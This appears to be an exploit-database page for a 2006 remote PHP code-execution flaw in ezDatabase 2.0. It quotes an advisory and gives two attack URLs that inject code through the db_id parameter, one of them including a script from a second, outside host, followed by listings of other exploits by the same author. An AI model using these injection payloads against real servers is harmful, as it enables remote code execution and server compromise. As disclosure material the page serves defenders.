Menu

Search for hundreds of thousands of exploits

"EZDatabaseRemote 2.0 - PHP Script Code Execution"

Author

Exploit author

r0t3d3Vil

Platform

Exploit platform

php

Release date

Exploit published date

2006-01-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
source: https://www.securityfocus.com/bid/16237/info

ezDatabase is prone to a remote PHP script code execution vulnerability.

An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.

ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected. 

http://www.example.com/visitorupload.php?db_id=;phpinfo()
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2006-03-22 "1WebCalendar 4.0 - 'mainCal.cfm' SQL Injection" webapps cfm r0t3d3Vil
2006-03-22 "1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection" webapps cfm r0t3d3Vil
2006-03-22 "1WebCalendar 4.0 - 'viewEvent.cfm?EventID' SQL Injection" webapps cfm r0t3d3Vil
2006-01-14 "EZDatabaseRemote 2.0 - PHP Script Code Execution" webapps php r0t3d3Vil
2005-12-30 "Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting" webapps php r0t3d3Vil
2005-12-30 "OOApp Guestbook 2.1 Home Script - Cross-Site Scripting" webapps php r0t3d3Vil
2005-12-30 "Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities" webapps php r0t3d3Vil
2005-12-27 "FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps java r0t3d3Vil
2005-12-26 "Jax Calendar 1.34 - 'jax_calendar.php' SQL Injection" webapps php r0t3d3Vil
2005-12-25 "EZ Invoice Inc. EZI 2.0 - 'Invoices.php' SQL Injection" webapps php r0t3d3Vil
2005-12-25 "CS-Cart - Multiple SQL Injections" webapps php r0t3d3Vil
2005-12-25 "LogicBill 1.0 - Multiple SQL Injections" webapps php r0t3d3Vil
2005-12-23 "PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting" webapps cfm r0t3d3Vil
2005-12-22 "Tangora Portal CMS 4.0 - 'Action' Cross-Site Scripting" webapps asp r0t3d3Vil
2005-12-21 "Papaya CMS 4.0.4 - Cross-Site Scripting" webapps php r0t3d3Vil
2005-12-21 "Commercial Interactive Media SCOOP! 2.3 - 'lostPassword.asp' Multiple Cross-Site Scripting Vulnerabilities" webapps asp r0t3d3Vil
2005-12-21 "Commercial Interactive Media SCOOP! 2.3 - 'account_login.asp' Multiple Cross-Site Scripting Vulnerabilities" webapps asp r0t3d3Vil
2005-12-21 "Papoo 2.1.2 - 'Guestbook.php?menuid' SQL Injection" webapps php r0t3d3Vil
2005-12-21 "OpenEdit 4.0 - Results.HTML Cross-Site Scripting" webapps jsp r0t3d3Vil
2005-12-21 "Sitekit CMS 6.6 - 'registration-form.html?ClickFrom' Cross-Site Scripting" webapps asp r0t3d3Vil
2005-12-21 "Quantum Art QP7.Enterprise - 'news_and_events_new.asp?p_news_id' SQL Injection" webapps asp r0t3d3Vil
2005-12-21 "SyntaxCMS - Search Query Cross-Site Scripting" webapps php r0t3d3Vil
2005-12-21 "Quantum Art QP7.Enterprise - 'news.asp?p_news_id' SQL Injection" webapps asp r0t3d3Vil
2005-12-21 "Commercial Interactive Media SCOOP! 2.3 - 'requestDemo.asp?Invalid' Cross-Site Scripting" webapps asp r0t3d3Vil
2005-12-21 "Papoo 2.1.2 - 'print.php' Multiple SQL Injections" webapps php r0t3d3Vil
2005-12-21 "Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings" webapps php r0t3d3Vil
2005-12-21 "PHPSlash 0.8.1 - 'article.php' SQL Injection" webapps php r0t3d3Vil
2005-12-21 "Papoo 2.1.2 - 'index.php?menuid' SQL Injection" webapps php r0t3d3Vil
2005-12-21 "Commercial Interactive Media SCOOP! 2.3 - 'articleSearch.asp' Cross-Site Scripting" webapps asp r0t3d3Vil
2005-12-21 "Sitekit CMS 6.6 - 'Request-call-back.html?ClickFrom' Cross-Site Scripting" webapps asp r0t3d3Vil
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.